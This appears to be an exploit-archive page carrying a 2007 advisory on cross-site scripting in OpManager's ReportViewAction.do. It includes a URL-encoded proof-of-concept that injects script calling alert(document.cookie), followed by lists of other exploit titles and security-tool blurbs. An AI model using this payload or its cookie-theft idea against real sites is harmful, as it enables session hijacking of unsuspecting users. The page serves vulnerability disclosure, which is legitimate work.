Menu

Search for hundreds of thousands of exploits

"OpManager 6/7 - reports/ReportViewAction.do Multiple Cross-Site Scripting Vulnerabilities"

Author

Exploit author

Lostmon

Platform

Exploit platform

java

Release date

Exploit published date

2007-07-04

1
2
3
4
5
6
7
source: https://www.securityfocus.com/bid/24767/info
  
OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
  
http://www.example.com/reports/ReportViewAction.do?selected Tab=Reports&selectedNode=Server_Memory_Utilization&reportN ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E %3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F% 6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6 D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20 %21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F% 57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6 1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69 %65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di splayName=webclient.reports.servers.memutil
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2012-03-28 "Apple Safari 5.1.5 For Windows - 'window.open()' URI Spoofing" remote windows Lostmon
2010-08-19 "Flock Browser 3.0.0 - Malformed Bookmark HTML Injection" remote multiple Lostmon
2010-08-04 "K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities" dos windows Lostmon
2009-10-29 "Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities" webapps php Lostmon
2009-06-28 "Google Chrome 2.0.172 - 'About:blank' Address Bar URI Spoofing 'About:blank' Address Bar URI Spoofing" remote multiple Lostmon
2009-01-27 "Apple Safari For Windows 3.2.1 - URI Remote Denial of Service" dos windows Lostmon
2008-11-04 "DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities" webapps php Lostmon
2008-08-25 "Bluemoon inc. PopnupBlog 3.30 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php Lostmon
2008-08-15 "PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion" webapps php Lostmon
2008-08-09 "RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting" webapps php Lostmon
2008-08-09 "RMSOFT MiniShop 1.0 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php Lostmon
2008-08-09 "Yogurt Social Network 3.2 rc1 Module for XOOPS - 'album.php?uid' Cross-Site Scripting" webapps php Lostmon
2008-08-09 "Yogurt Social Network 3.2 rc1 Module for XOOPS - 'tribes.php?uid' Cross-Site Scripting" webapps php Lostmon
2008-08-09 "Yogurt Social Network 3.2 rc1 Module for XOOPS - 'scrapbook.php?uid' Cross-Site Scripting" webapps php Lostmon
2008-08-09 "RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS down.php?id' Cross-Site Scripting" webapps php Lostmon
2008-08-09 "Yogurt Social Network 3.2 rc1 Module for XOOPS - 'seutubo.php?uid' Cross-Site Scripting" webapps php Lostmon
2008-08-09 "Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php?uid' Cross-Site Scripting" webapps php Lostmon
2008-08-09 "Yogurt Social Network 3.2 rc1 Module for XOOPS - 'friends.php?uid' Cross-Site Scripting" webapps php Lostmon
2008-08-06 "Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting" webapps php Lostmon
2008-05-19 "bcoos 1.0.13 - 'file' Local File Inclusion" webapps php Lostmon
2008-02-04 "DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities" webapps php Lostmon
2007-12-29 "PHCDownload 1.1 - 'search.php?string' Cross-Site Scripting" webapps php Lostmon
2007-12-29 "PHCDownload 1.1 - 'search.php?string' SQL Injection" webapps php Lostmon
2007-12-10 "E-Xoops 1.0.5/1.0.8 - '/mydownloads/ratefile.php?lid' SQL Injection" webapps php Lostmon
2007-12-10 "E-Xoops 1.0.5/1.0.8 - '/mylinks/ratelink.php?lid' SQL Injection" webapps php Lostmon
2007-12-10 "E-Xoops 1.0.5/1.0.8 - '/mysections/ratefile.php?lid' SQL Injection" webapps php Lostmon
2007-12-10 "E-Xoops 1.0.5/1.0.8 - '/modules/arcade/index.php?gid' SQL Injection" webapps php Lostmon
2007-12-10 "E-Xoops 1.0.5/1.0.8 - '/adresses/ratefile.php?lid' SQL Injection" webapps php Lostmon
2007-12-10 "E-Xoops 1.0.5/1.0.8 - '/myalbum/ratephoto.php?lid' SQL Injection" webapps php Lostmon
2007-12-10 "E-Xoops 1.0.5/1.0.8 - '/modules/banners/click.php?bid' SQL Injection" webapps php Lostmon
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.